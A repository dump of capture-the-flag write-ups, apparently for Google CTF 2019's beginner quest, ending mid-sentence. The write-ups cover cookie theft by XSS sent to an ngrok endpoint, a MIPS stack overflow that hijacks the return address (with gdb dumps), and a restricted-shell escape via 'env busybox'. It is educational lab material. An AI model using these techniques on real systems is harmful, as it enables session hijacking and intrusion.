├── 01-reversing-rand2 ├── 01.zip ├── README.md ├── log.txt └── rand2 ├── 02-misc-satellite ├── README.md ├── README.pdf ├── ctf2.zip └── init_sat ├── 03-reversing-family-computer ├── 03.zip ├── README.md ├── credentials.txt ├── extract-stream.ps1 ├── file0.png └── note.txt ├── 04-web-gov-xss └── README.md ├── 05-pwn-buffer-overflow ├── 05.zip ├── README.md ├── bof ├── console.c ├── controlled-payload ├── flag ├── flag1 ├── input-controlled.txt ├── input.txt └── segfault-payload ├── 06-sandbox-readme └── README.md ├── 07-reversing-emoji ├── .gitignore ├── 07.zip ├── README.md ├── __pycache__ │ ├── crawl.cpython-36.pyc │ └── vm.cpython-36.pyc ├── ctf_crawl │ ├── ctf_crawl │ │ ├── __init__.py │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-36.pyc │ │ │ └── settings.cpython-36.pyc │ │ ├── items.py │ │ ├── middlewares.py │ │ ├── pipelines.py │ │ ├── settings.py │ │ └── spiders │ │ │ ├── __init__.py │ │ │ ├── __pycache__ │ │ │ ├── __init__.cpython-36.pyc │ │ │ └── cat_images.cpython-36.pyc │ │ │ └── cat_images.py │ ├── images.zip │ ├── output.json │ └── scrapy.cfg ├── extract-palindroms.py ├── palindromes ├── palindromes.py ├── program ├── translated ├── vm.modified.py └── vm.py ├── 08-misc-drive-to-target ├── README.md └── drive.py ├── 09-web-cwo-xss └── README.md ├── 10-crypto-caulingo ├── 10.zip ├── README.md ├── decode.py ├── msg.txt └── project_dc.pdf ├── 11-hardware-gatelock ├── 11.zip ├── README.md ├── beginner │ ├── auth.sqlite │ ├── env_meta.txt │ ├── force_loaded.txt │ ├── ipban.txt │ ├── map.sqlite │ ├── map_meta.txt │ ├── mesecon_actionqueue │ ├── players.sqlite │ ├── schems │ │ └── challenge.mts │ └── world.mt └── challenge.tgz ├── 12-misc-promo ├── README.md └── screenshot.png ├── README.md └── assets └── map.png /01-reversing-rand2/01.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/01-reversing-rand2/01.zip -------------------------------------------------------------------------------- /01-reversing-rand2/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | ## Invitation 3 | 4 | You are a simple life form, exiled from your home planet and in search of a new place to call home. The ruling came fast. Your taste in music was deemed to be far too "out-there-man" for anyone to possibly associate with you anymore. You were given 60 revolutions of Xenon around Fir to leave and never return. Gather whatever possessions and leave. You find your parents music collection, oddly in it is a golden disc labelled "Property of NASA, if lost please return to: EVNJAKL 1600 Ampitheatre Parkway Mountain View California." The music on the disc was uncovered a while back and was not very interesting. This weird language that said something about "Peace, love and rock and roll. Also we're having a really cool party tonight, so for whoever is out there, bring a friend and come along! Co-ordinates enclosed." On the back the words "Draft, do not distribute or load onto probe" written in big red letters. That could mean anything. 5 | 6 | You'll go, since you have nowhere else to go. But you'll be careful. You well know to learn all you can about alien beings before making contact. They could be hostile, or listen to boring music. Time is slipping away fast, you race aboard the nearest ObarPool Spaceship. But you've never driven one... what next genius? 7 | 8 | ## Enter Space-Time Coordinates 9 | Label: misc 10 | 11 | Ok well done. The console is on. It's asking for coordinates. Beating heavily on the console yields little results, but the only time anything changes on your display is when you put in numbers.. So what numbers are you going to go for? You see the starship's logs, but is there a manual? Or should you just keep beating the console? 12 | 13 | 14 | # Solution 15 | The attachment is a zip file containing a `log.txt` file and a `rand2` program. Running `strings` on the binary shows the flag `CTF{welcome_to_googlectf}` 16 | -------------------------------------------------------------------------------- /01-reversing-rand2/log.txt: -------------------------------------------------------------------------------- 1 | 0: AC+79 3888{6652492084280_198129318435598} 2 | 1: Pliamas Sos{276116074108949_243544040631356} 3 | 2: Ophiuchus{11230026071572_273089684340955} 4 | 3: Pax Memor -ne4456 Hi Pro{21455190336714_219250247519817} 5 | 4: Camion Gyrin{235962764372832_269519420054142} 6 | -------------------------------------------------------------------------------- /01-reversing-rand2/rand2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/01-reversing-rand2/rand2 -------------------------------------------------------------------------------- /02-misc-satellite/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | ## Arrival & Reconnaissance 3 | 4 | Having successfully figured out this "coordinate" problem. The ship lurches forward violently into space. This is one of the moments when you realize that some kind of thought or plan would have been good, but typically for you and how you found yourself in this situation, you didn't think too much before acting. Only the stars themselves know where you'll end up. 5 | 6 | After what seems like an eternity, or at least one full season of "Xenon's Next Top Galactic Overlord" you arrive in a system of 9 planetary bodies, though one of them is exceptionally small. You nostalgically remember playing explodatoid with your friends and hunting down planets like this. But this small planet registers a hive of noise and activity on your ships automated scanners. There's things there! Billions upon trillions of things, moving around, flying, swimming, sliding, falling. 7 | 8 | Of particular interest may be the insect-like creatures flying around this planet, uniformly. One has the words "Osmium Satellites" written on it. Maybe this is a starting point to get to know what's ahead of you. 9 | 10 | ## Satellite 11 | Label: networking 12 | 13 | Placing your ship in range of the Osmiums, you begin to receive signals. Hoping that you are not detected, because it's too late now, you figure that it may be worth finding out what these signals mean and what information might be "borrowed" from them. Can you hear me Captain Tim? Floating in your tin can there? Your tin can has a wire to ground control? 14 | 15 | Find something to do that isn't staring at the Blue Planet. 16 | 17 | # Solution 18 | Another attachment that is a zip file which contains a `README.pdf` and a `init_sat` binary. Opening the pdf shows some text and a picture containing the word `osmium`. 19 | Running the binary shows a prompt asking for a satellite name. Enter `osmium` and it presents 3 choices. Entering `a` will print some information including a link to a google doc `https://docs.google.com/document/d/14eYPluD_pi3824GAFanS29tWdTcKxP_XUxx7e303-3E`. The doc contains a single string `VXNlcm5hbWU6IHdpcmVzaGFyay1yb2NrcwpQYXNzd29yZDogc3RhcnQtc25pZmZpbmchCg==` which is base64 encoded which we can recognize by the characters and the `==` padding at the end. Decoding the string gives us 20 | ``` 21 | Username: wireshark-rocks 22 | Password: start-sniffing! 23 | ``` 24 | 25 | So now with wireshark open, as we enter `a` again and look at the traffic, we can see the flag in the text sent over the network `CTF{4efcc72090af28fd33a2118985541f92e793477f}` -------------------------------------------------------------------------------- /02-misc-satellite/README.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/README.pdf -------------------------------------------------------------------------------- /02-misc-satellite/ctf2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/ctf2.zip -------------------------------------------------------------------------------- /02-misc-satellite/init_sat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/init_sat -------------------------------------------------------------------------------- /03-reversing-family-computer/03.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/03-reversing-family-computer/03.zip -------------------------------------------------------------------------------- /03-reversing-family-computer/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | ## Home Computer 3 | Label: forensics 4 | 5 | Blunderbussing your way through the decision making process, you figure that one is as good as the other and that further research into the importance of Work Life balance is of little interest to you. You're the decider after all. You confidently use the credentials to access the "Home Computer." 6 | 7 | Something called "desktop" presents itself, displaying a fascinating round and bumpy creature (much like yourself) labeled "cauliflower 4 work - GAN post." Your 40 hearts skip a beat. It looks somewhat like your neighbors on XiXaX3. ..Ah XiXaX3... You'd spend summers there at the beach, an awkward kid from ObarPool on a family vacation, yearning, but without nerve, to talk to those cool sophisticated locals. 8 | 9 | So are these "Cauliflowers" earthlings? Not at all the unrelatable bipeds you imagined them to be. Will they be at the party? Hopefully SarahH has left some other work data on her home computer for you to learn more. 10 | 11 | # Solution 12 | This attachment is a zip file containing a `family.ntfs` and `note.txt` file. Opening the `family.ntfs` file in something like 7zip shows the contents of a windows filesystem. Most of the files are empty, but we if navigate to `Users/Family/Documents` there is a file called `credentials.txt`. Opening the text file shows `I keep pictures of my credentials in extended attributes.`. Searching for ntfs extended attributes did not give much information but I knew there was something called `alternate data streams`, so maybe it meant those. Checking the data streams was easy with powershell 13 | ```ps 14 | Get-Item credentials.txt -stream * 15 | ``` 16 | With that command, we can see that there is in fact another steam called `FILE0`. We can then extract the steam contents into a .png file which reveals the flag `CTF{congratsyoufoundmycreds}` 17 | 18 | The script `extract-stream.ps1` will extract the image from the file. -------------------------------------------------------------------------------- /03-reversing-family-computer/credentials.txt: -------------------------------------------------------------------------------- 1 | I keep pictures of my credentials in extended attributes. 2 | -------------------------------------------------------------------------------- /03-reversing-family-computer/extract-stream.ps1: -------------------------------------------------------------------------------- 1 | Get-Item credentials.txt -stream * 2 | $file = Get-Content credentials.txt -stream 'FILE0' -Encoding Byte -ReadCount 0 3 | Set-Content 'file0.png' -Encoding Byte -Value $file 4 | -------------------------------------------------------------------------------- /03-reversing-family-computer/file0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/03-reversing-family-computer/file0.png -------------------------------------------------------------------------------- /03-reversing-family-computer/note.txt: -------------------------------------------------------------------------------- 1 | If you're on MacOS, you can rename .ntfs to .dmg 2 | -------------------------------------------------------------------------------- /04-web-gov-xss/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | ## Government Agriculture Network 3 | Label: web 4 | 5 | Well it seems someone can't keep their work life and their home life separate. You vaguely recall on your home planet, posters put up everywhere that said "Loose Zips sink large commercial properties with a responsibility to the shareholders." You wonder if there is a similar concept here. 6 | 7 | Using the credentials to access this so-called Agricultural network, you realize that SarahH was just hired as a vendor or contract worker and given access that was equivalent. You can only assume that Vendor/Contractor is the highest possible rank bestowed upon only the most revered and well regarded individuals of the land and expect information and access to flow like the Xenovian acid streams you used to bathe in as a child. 8 | 9 | The portal picture displays that small very attractive individual whom you instantly form a bond with, despite not knowing. You must meet this entity! Converse and convince them you're meant to be! After a brief amount of time the picture shifts into a biped presumably ingesting this creature! HOW DARE THEY. You have to save them, you have to stop this from happening. Get more information about this Gubberment thing and stop this atrocity. 10 | 11 | You need to get in closer to save them - you beat on the window, but you need access to the cauliflower's host to rescue it. 12 | 13 | # Solution 14 | This one just links to a site `https://govagriculture.web.ctfcompetition.com`. The site just contains 2 images, and a input along with a submit button to create a post. There is also an admin link in the top nav bar. Clicking the admin link just lead to `https://govagriculture.web.ctfcompetition.com/admin` but redirected back to the main page. Clicking the submitted button did a POST to `https://govagriculture.web.ctfcompetition.com/post` with a response page that just said `Your post was submitted for review. Administator will take a look shortly. `. Nothing else happens afterwards. I was stuck on this for a while as I had no idea what to do since the submit or admin links did not appear to do anything. As the name of the task implies, an xss exploit is used somehow but I couldn't figure out how. After spending a lot of time clicking around, I saw a hint that creating a post would get a fake 'admin' on the server to view the post. Without that hint I would be wasting a lot more time. 15 | 16 | So now with that hint, I assumed that I would have to use xss to grab the cookies when the admin viewed the page and then send it back somehome. Unsure if my ISP even let me expose a webserver, I setup a tunnel using `ngrok`. All I did was run `ngrok http 80` and did not even need to setup a server since all I needed was a way to see the data. After setting that up, I entered this script as the post contents 17 | ```js 18 | 22 | ``` 23 | The idea is that the cookies would be ecoded and sent to the endpoint through a request when the image tries to load. 24 | 25 | After hitting submit, I looked in the dashboard and saw that indeed a request had been made to the url along with the cookies as a query parameter. A quick decode and we have our flag `CTF{8aaa2f34b392b415601804c2f5f0f24e}` -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/05.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/05.zip -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | ## STOP GAN 3 | Label: pwn 4 | 5 | Success, you've gotten the picture of your lost love, not knowing that pictures and the things you take pictures of are generally two seperate things, you think you've rescue them and their brethren by downloading them all to your ships hard drive. They're still being eaten, but this is a fact that has escaped you entirely. Your thoughts swiftly shift to revenge. It's important now to stop this program from destroying these "Cauliflowers" as they're referred to, ever again. 6 | 7 | # Solution 8 | This attachment is a zip file containing a `bof` binary and a `console.c` source file. The description for the task also includes the text `buffer-overflow.ctfcompetition.com 1337`. Looking at the source file, we see that the binary `bof` is run using qemu and then we have to send input into that program and cause it to crash. There is also a bonus flag if we can cause a controlled crash. To test locally I just ran `qemu-mipsel bof` which runs the program and shows the prompt `Cauliflower systems never crash >>`. Entering text into the prompt just closes it. Since the goal was to use a buffer overflow I decided to just input a lot of text into the program and with a long enough input, a segfault is created. Now all we have to do is try in on the actual program. So we connect to the server provided in the task `nc buffer-overflow.ctfcompetition.com 1337`, enter `run` then enter our long string of input. After a successful crash, it prints out the flag `CTF{Why_does_cauliflower_threaten_us}` 9 | 10 | Since there is another flag, I decided to take a look at decompiling the `bof` binary. For this I used `ghidra`. Since I don't have much experience with this, it was quite difficult to figure out everything, but after playing around with it for a while this was what I figured out. This is what I figured out about what the program looks like 11 | ```c 12 | int main(void) 13 | { 14 | sighandler_t prevHandler; 15 | int returnVal; 16 | byte buffer[260]; 17 | 18 | prevHandler = signal(SIGSEGV, segfault_handler); 19 | if (prevHandler == -1) { 20 | printf("An error occurred setting a signal handler."); 21 | returnVal = -1; 22 | } else { 23 | puts("Cauliflower systems never crash >>"); 24 | scanf("%s", &buffer); 25 | returnVal = 0; 26 | } 27 | return returnVal; 28 | } 29 | 30 | void segfault_handler(void) 31 | { 32 | printf("segfault detected! ***CRASH***"); 33 | print_file("flag"); 34 | exit(0); 35 | } 36 | 37 | void print_file(char *filename) 38 | { 39 | int fileDescriptor; 40 | char buffer[4]; 41 | int bytesRead; 42 | 43 | fileDescriptor = open(filename, O_RDONLY); 44 | if (fileDescriptor == -1) { 45 | puts("could not open flag"); 46 | exit(1); 47 | } 48 | while ((bytesRead = read(fileDescriptor, &buffer, 1)) == 1) { 49 | write(STDOUT_FILENO, &buffer, 1); 50 | } 51 | close(fileDescriptor); 52 | return; 53 | } 54 | ``` 55 | 56 | You can see that it does a `scanf` into a buffer of size 260. Therefore if we input something that is greater that `260 + 4 (frame pointer)` bytes, we should get a segfault because then we overwrite the return address. The `segfault-payload` file contains the data for causing a segfault. 57 | 58 | ``` 59 | Stack 60 | +---------------------------+ High 61 | |Previous frame | 62 | | | 63 | +---------------------------+ 64 | |Return address | 65 | +---------------------------+ 66 | |Buffer | 67 | | | 68 | | | 69 | | | 70 | | | 71 | +---------------------------+ 72 | |return value | 73 | +---------------------------+ 74 | |signal_handler | 75 | +---------------------------+ Low 76 | ``` 77 | 78 | Notice that there is no sign of the hidden flag in there. That was because ghidra removed an unreachable block. If we look at the assembly instead we can see the hidden block. 79 | ```mips 80 | 004009bc 60 1f 11 04 bal scanf ;call scanf() 81 | 004009c0 00 00 00 00 _nop ;branch delay slot 82 | 004009c4 10 00 dc 8f lw gp,0x10(s8) ;?? 83 | 004009c8 18 00 c2 8f lw returnVal,0x18(s8) ;load word into returnVal 84 | 004009cc 07 00 40 14 bne returnVal,zero,setNormalReturnValue ;this jump skips over the get hidden flag section 85 | 004009d0 00 00 00 00 _nop 86 | getHiddenFlag 87 | 004009d4 30 80 82 8f lw returnVal,-0x7fd0(gp) 88 | 004009d8 40 08 42 24 addiu returnVal,returnVal,0x840 89 | 004009dc 25 c8 40 00 or t9,returnVal,zero 90 | 004009e0 97 ff 11 04 bal local_flag ;local_flag() 91 | 004009e4 00 00 00 00 _nop ;branch delay slot 92 | 004009e8 10 00 dc 8f lw gp,0x10(s8) 93 | setNormalReturnValue 94 | 004009ec 25 10 00 00 or returnVal,zero,zero 95 | exit 96 | 004009f0 25 e8 c0 03 or sp,s8,zero 97 | 004009f4 24 01 bf 8f lw ra,0x124(sp) 98 | 004009f8 20 01 be 8f lw s8,0x120(sp) 99 | 004009fc 28 01 bd 27 addiu sp,sp,0x128 100 | 00400a00 08 00 e0 03 jr ra 101 | 00400a04 00 00 00 00 _nop 102 | ``` 103 | 104 | And this is the print local function 105 | ```c 106 | void local_flag(void) 107 | { 108 | print_file("flag1"); 109 | exit(0); 110 | } 111 | ``` 112 | 113 | To get a better picture of what is happening, I used qemu with the gdb debugger to step examine the stack frame. 114 | ``` 115 | > qemu-mipsel-static -g 5555 bof 116 | > gdb-multiarch 117 | > (gdb) target remote localhost:5555 118 | ``` 119 | 120 | We can then set a breakpoint after `scanf` 121 | > (gdb) b *0x004009c4 122 | 123 | Then print out information. Here was the information from the gdb session 124 | ``` 125 | (gdb) i frame 126 | Stack level 0, frame at 0x7fffd8f0: 127 | pc = 0x4009c4 in main; saved pc = 0x400840 128 | Arglist at 0x7fffd8f0, args: 129 | Locals at 0x7fffd8f0, Previous frame's sp is 0x7fffd8f0 130 | Saved registers: 131 | gp at 0x7fffd7d8, s8 at 0x7fffd8e8, ra at 0x7fffd8ec, pc at 0x7fffd8ec 132 | (gdb) x/100xw $sp 133 | 0x7fffd7c8: 0x00000060 0x7fffd7e4 0x00000001 0x00000000 134 | 0x7fffd7d8: 0x004a8970 0x00000000 0x00000001 0xaaaaaaaa 135 | 0x7fffd7e8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 136 | 0x7fffd7f8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 137 | 0x7fffd808: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 138 | 0x7fffd818: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 139 | 0x7fffd828: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 140 | 0x7fffd838: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 141 | 0x7fffd848: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 142 | 0x7fffd858: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 143 | 0x7fffd868: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 144 | 0x7fffd878: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 145 | 0x7fffd888: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 146 | 0x7fffd898: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 147 | 0x7fffd8a8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 148 | 0x7fffd8b8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 149 | 0x7fffd8c8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 150 | 0x7fffd8d8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 151 | 0x7fffd8e8: 0xaaaaaaaa 0x00400840 <-- return address 152 | ``` 153 | 154 | From here I tried overwriting the return address to point to the `read_local` function. Writing to the start of the function `0x00400840` successfuly jumped to the function but when it entered the `print_file` subroutine it crashed. Still not sure about why this happens. Instead, I skipped over some of the setup in the function and jumped to the address `0x00400860` which is where the stack is being setup for the call into `print_file`. This worked as the flag `CTF{controlled_crash_causes_conditional_correspondence}` was printed out. -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/bof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/bof -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/console.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | /** 7 | * 6e: bufferflow triggering segfault - binary, compile with: 8 | * gcc /tmp/console.c -o /tmp/console -static -s 9 | * 10 | * Console allows the player to get info on the binary. 11 | * Crashing bof will trigger the 1st flag. 12 | * Controlling the buffer overflow in bof will trigger the 2nd flag. 13 | */ 14 | 15 | int main() { 16 | setbuf(stdin, NULL); 17 | setbuf(stdout, NULL); 18 | setbuf(stderr, NULL); 19 | char inputs[256]; 20 | printf("Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.\n Bonus flag for controlling the crash.\n"); 21 | while(1) { 22 | printf("\nConsole commands: \nrun\nquit\n>>"); 23 | if (fgets(inputs, 256, stdin) == NULL) { 24 | exit(0); 25 | } 26 | printf("Inputs: %s", inputs); 27 | if ( strncmp(inputs, "run\n\0", 256) == 0 ) { 28 | int result = system("/usr/bin/qemu-mipsel-static ./bof"); 29 | continue; 30 | } else if ( strncmp(inputs, "quit\n\0", 256) == 0 ) { 31 | exit(0); 32 | } else { 33 | puts("Unable to determine action from your input"); 34 | exit(0); 35 | } 36 | } 37 | return 0; 38 | } 39 | -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/controlled-payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/controlled-payload -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/flag: -------------------------------------------------------------------------------- 1 | {flag} 2 | -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/flag1: -------------------------------------------------------------------------------- 1 | {flag1} 2 | -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/input-controlled.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/input-controlled.txt -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/input.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/input.txt -------------------------------------------------------------------------------- /05-pwn-buffer-overflow/segfault-payload: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/segfault-payload -------------------------------------------------------------------------------- /06-sandbox-readme/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | ## Work Computer 3 | Label: sandbox 4 | 5 | With the confidence of conviction and decision making skills that made you a contender for Xenon's Universal takeover council, now disbanded, you forge ahead to the work computer. This machine announces itself to you, surprisingly with a detailed description of all its hardware and peripherals. Your first thought is "Why does the display stand need to announce its price? And exactly how much does 999 dollars convert to in Xenonivian Bucklets?" You always were one for the trivialities of things. 6 | 7 | Also presented is an image of a fascinating round and bumpy creature, labeled "Cauliflower for cWo" - are "Cauliflowers" earthlings? Your 40 hearts skip a beat - these are not the strange unrelatable bipeds you imagined earthings to be.. this looks like your neighbors back home. Such curdley lobes. Will it be at the party? 8 | 9 | SarahH, who appears to be a programmer with several clients, has left open a terminal. Oops. Sorry clients! Aliens will be poking around attempting to access your networks.. looking for Cauliflower. That is, *if* they can learn to navigate such things. 10 | 11 | # Solution 12 | This task only provides the address `readme.ctfcompetition.com 1337`. When connected, we are presented with a shell. Typing `help` shows 13 | ``` 14 | > help 15 | Alien's shell 16 | Type program names and arguments, and hit enter. 17 | The following are built in: 18 | cd 19 | help 20 | exit 21 | Use the man command for information on other programs. 22 | ``` 23 | Trying something like `ls` shows us two items `ORME.flag` and `README.flag` seems like there might be two flags. Trying to execute files shows `permission denied`. Lets see what programs are available. 24 | > ls /bin 25 | 26 | ``` 27 | arch 28 | busybox 29 | chgrp 30 | chown 31 | conspy 32 | date 33 | df 34 | dmesg 35 | dnsdomainname 36 | dumpkmap 37 | echo 38 | false 39 | df 40 | dmesg 41 | dnsdomainname 42 | dumpkmap 43 | echo 44 | false 45 | fdflush 46 | fsync 47 | getopt 48 | hostname 49 | ionice 50 | iostat 51 | ipcalc 52 | kill 53 | login 54 | ls 55 | lzop 56 | makemime 57 | mkdir 58 | mknod 59 | mktemp 60 | mount 61 | mountpoint 62 | mpstat 63 | netstat 64 | nice 65 | pidof 66 | ping 67 | ping6 68 | pipe_progress 69 | printenv 70 | ps 71 | pwd 72 | reformime 73 | rm 74 | rmdir 75 | run-parts 76 | setpriv 77 | setserial 78 | shell 79 | sleep 80 | stat 81 | stty 82 | sync 83 | tar 84 | true 85 | umount 86 | uname 87 | usleep 88 | watch 89 | ``` 90 | 91 | I'm not too familiar with all the tools but one of them probably allows us to access to file. Going down the list, I saw `busybox` which seems promising. However running busybox shows the message `busybox can not be called for alien reasons.` So it seems that this may be our target. 92 | 93 | Running `ls -l`, the `README.flag` file is readable but tools like `cat` or `tail` did not exist. So I went down the list for a tool that could possibly read files. Something I learned was the `makemime` tool because after reading up on it, it appears to be able to read a file. Running 94 | > makemime README.flag 95 | 96 | Gives us: 97 | ``` 98 | > makemime README.flag 99 | Mime-Version: 1.0 100 | Content-Type: multipart/mixed; boundary="245967688-281105878-1932398038" 101 | 102 | --245967688-281105878-1932398038 103 | Content-Type: application/octet-stream; charset=us-ascii 104 | Content-Disposition: inline; filename="README.flag" 105 | Content-Transfer-Encoding: base64 106 | 107 | Q1RGezRsbF9ENDc0XzVoNGxsX0IzX0ZyMzN9Cg== 108 | --245967688-281105878-1932398038-- 109 | ``` 110 | 111 | That string `Q1RGezRsbF9ENDc0XzVoNGxsX0IzX0ZyMzN9Cg==` looks like base64, and indeed decoding it gives us `CTF{4ll_D474_5h4ll_B3_Fr33}`. Now trying it for the other flag just left a blank screen so it was back to figuring out how to open busybox. At least that was the only thing I could think of. We also have to get permissions to access to file. I found a hint for this one which is the `env` command. The `env` command is able to execute a program and running `env busybox` worked. Now all I had to do was chmod and add read permissions 112 | ``` 113 | > env busybox chmod +r ORME.flag 114 | > makemime ORME.flag 115 | Mime-Version: 1.0 116 | Content-Type: multipart/mixed; boundary="790050884-595716176-916811417" 117 | 118 | --790050884-595716176-916811417 119 | Content-Type: application/octet-stream; charset=us-ascii 120 | Content-Disposition: inline; filename="ORME.flag" 121 | Content-Transfer-Encoding: base64 122 | 123 | Q1RGe1RoM3IzXzFzXzRsdzR5NV80TjA3aDNyX1c0eX0K 124 | --790050884-595716176-916811417-- 125 | ``` 126 | 127 | Another base64 decode and we get the flag `CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}` -------------------------------------------------------------------------------- /07-reversing-emoji/.gitignore: -------------------------------------------------------------------------------- 1 | primes*.txt -------------------------------------------------------------------------------- /07-reversing-emoji/07.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/07.zip -------------------------------------------------------------------------------- /07-reversing-emoji/README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | ## FriendSpaceBookPlusAllAccessRedPremium.com 3 | Label: reversing 4 | 5 | Having snooped around like the expert spy you were never trained to be, you found something that takes your interest: "Cookie/www.FriendSpaceBookPlusAllAccessRedPremium.com" But unbeknownst to you, it was only the 700nm Wavelength herring rather than a delicious cookie that you could have found. It looks exactly like a credential for another system. You find yourself in search of a friendly book to read. 6 | 7 | Having already spent some time trying to find a way to gain more intelligence... and learn about those fluffy creatures, you (several)-momentarily divert your attention here. It's a place of all the individuals in the world sharing large amounts of data with one another. Strangely enough, all of the inhabitants seem to speak using this weird pictorial language. And there is hot disagreement over what the meaning of an eggplant is. 8 | 9 | But not much Cauliflower here. They must be very private creatures. SarahH has left open some proprietary tools, surely running this will take you to them. Decipher this language and move forth! 10 | 11 | # Solution 12 | The attachment is zip containing a `program` file and a `vm.py` file. Looking at the files, it appears that there is a stack based virtual machine implemented in `vm.py` which runs emoji based code located in `program`. If we just run the program `python3 vm.py program`, it begins to print out a url however it seems to stop after a bit. I initially thought that I would have to translate the program to figure out what it does and try to fix it however after waiting a bit, the program prints out more of the url. It seems that whatever the program is doing, takes longer and longer to calculate the result. After waiting long enough we can guess the url `http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com`. 13 | 14 | The website appears to be a collection of pictures of cats. Each page has a picture and a set of links and each link leads to another page and so on. Using `scrapy`, I crawled all the links and downloaded all the images. Going through them, it doesn't look like any of the pictures have the flag in it, either in the image itself or in the binary. So maybe the guess is incorrect and there is still more in the url. 15 | 16 | Taking a look at the program again, it seems like there are 3 phases of `🚛 🥇 1️⃣ 0️⃣ 1️⃣ 1️⃣ 4️⃣ 1️⃣ 0️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇` instructions. Looking at the operations map, these instructions are creating and pushing the values of the first register onto the stack. Note that each block also ends with `🚛 🥈 7️⃣ 6️⃣ 5️⃣ ✋` which loads a value into the second register. If we work backwords by searching for all the print instructions (🎤), we can see that they all have a `xor (🌓)` instruction before it. So the first assumption is it is xoring each of the numbers in the stack and printing them out. Adding these lines `print("{} ^ {}\n".format(b, a))` to the `xor` function in the vm prints out 17 | 18 | ``` 19 | 106 ^ 2 h 20 | 119 ^ 3 t 21 | 113 ^ 5 t 22 | 119 ^ 7 p 23 | 49 ^ 11 24 | 74 ^ 101 25 | 172 ^ 131 26 | 242 ^ 151 27 | 216 ^ 181 28 | 208 ^ 191 29 | 339 ^ 313 30 | 264 ^ 353 31 | 344 ^ 373 32 | 267 ^ 383 33 | 743 ^ 727 34 | 660 ^ 757 35 | 893 ^ 787 36 | 892 ^ 797 37 | 1007 ^ 919 38 | 975 ^ 929 39 | ``` 40 | 41 | The numbers on the left of the xor match the values pushed onto the stack. All 3 blocks are similar so we can assume that they all doing the same thing different numbers. And we can also guess that the numbers on the right have to be calculated and the time it takes to calculate those increase as the program goes on. We can also see that the numbers on the right are primes and that supports our theory that maybe we need 